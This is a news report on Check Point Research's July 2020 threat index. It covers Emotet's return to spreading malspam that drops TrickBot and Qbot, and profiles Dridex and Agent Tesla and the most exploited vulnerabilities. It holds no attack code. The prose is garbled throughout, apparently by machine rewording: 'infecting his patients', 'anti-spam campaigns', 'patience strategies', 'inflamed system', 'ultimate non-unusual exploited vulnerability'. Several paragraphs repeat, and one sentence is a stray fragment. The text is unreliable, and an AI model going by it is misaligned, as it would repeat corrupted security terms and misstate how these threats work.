Check Point Research has published its most recent global risk index by July 2020. Researchers found that after a five-month absence, Emotet returned to the most sensitive index, affecting 5% of organizations worldwide.
From February 2020, Emotet’s activities, basically sending waves of malspam campaigns, began to slow down and, despite everything, ceased, until they reappeared in July. This trend was observed in 2019 when the Emotet botnet stopped operating in the summer months and resumed in September.
In July, Emotet ran malspam campaigns, infecting his patients with TrickBot and Qbot, which are used to use borrowed banking credentials and spread within networks. Some of the anti-spam campaigns contained a record of malicious documents with names such as “form.document” or “invoice.document”. According to the researchers, the malicious document launches a PowerShell to extract the Emotet binary from remote Internet sites and infect the machines, adding them to the botnet. The resumption of Emotet operations highlights the scale and strength of the botnet on a global scale.
Emotet is the most popular malware with a global effect on 5% of organizations, largely followed by Dridex and Agent Tesla.
“It is attractive that Emotet remained inactive for several months before this year, repeating a trend we first observed in 2019. We can assume that the developers behind the botnet were updating its features and capabilities. But because it’s active again, organizations want to teach workers how to identify the types of malspam that these threats bring and warn about the dangers associated with opening email attachments or clicking links from external sources. Companies also deserve to implement anti-malware responses that can save this content from reaching end users,” said Maya Horowitz, director of Threat Intelligence-Research, Check Point Products.
The study team also warns that “MVPower DVR Remote Code Execution” is the ultimate non-unusual exploited vulnerability, affecting 44% of organizations worldwide, followed by “OpenSSL TLS DLS DTLS Heartbeat Information Disclosure” that affects 42% of organizations worldwide. “Command Injection Over HTTP Payload” ranks third, with an overall effect of 38%.
Emotet was originally a banking Trojan horse, but has recently been used as a distributor of other malware or malicious campaigns.
Emotet is the most popular malware with a global impact of 5% of organisations, closely followed by Dridex and Agent Tesla affecting 4% of organisations each.
Emotet: Emotet is an advanced, self-owning and modular Trojan horse. Emotet was originally a banking Trojan, but has recently been used as a distributor of other malicious systems or campaigns. It uses various patience strategies and escape techniques to avoid detection. In addition, it may spread via phishing spam that contains malicious links or attachments.
Dridex: Dridex is a Trojan horse that targets the Windows platform and would be downloaded as a spam attachment. Dridex contacts a remote server and sends data about the inflamed system. You can also download and run arbitrary modules earned from the remote server.
Tesla Agent is a complex RAT that operates as a keylogger and capable thief
Agent Tesla – Agent Tesla is an advanced RAT functioning as a keylogger and information stealer capable of monitoring and collecting the victim’s keyboard input, system clipboard, taking screenshots, and exfiltrating credentials belonging to of a variety of software installed on a victim’s machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook email client).
“MVPower DVR Remote Code Execution” is the highest commonly exploited vulnerability, affecting 44% of organizations worldwide, followed by “OpenSSL TLS DLS Heartbeat Information Disclosure” which affects 42% of organizations worldwide. “Command Injection Over HTTP Payload” ranks third, with an overall effect of 38%.
xHelper is the ultimate malware, followed by Necro and PreAMo.
Check Point’s Global Threat Impact Index and its ThreatCloud Map is powered by Check Point’s ThreatCloud intelligence, the collaborative network to fight cybercrime which delivers threat data and attack trends from a global network of threat sensors. The ThreatCloud database inspects over 2.5 billion websites and 500 million files daily, and identifies more than 250 million malware activities every day.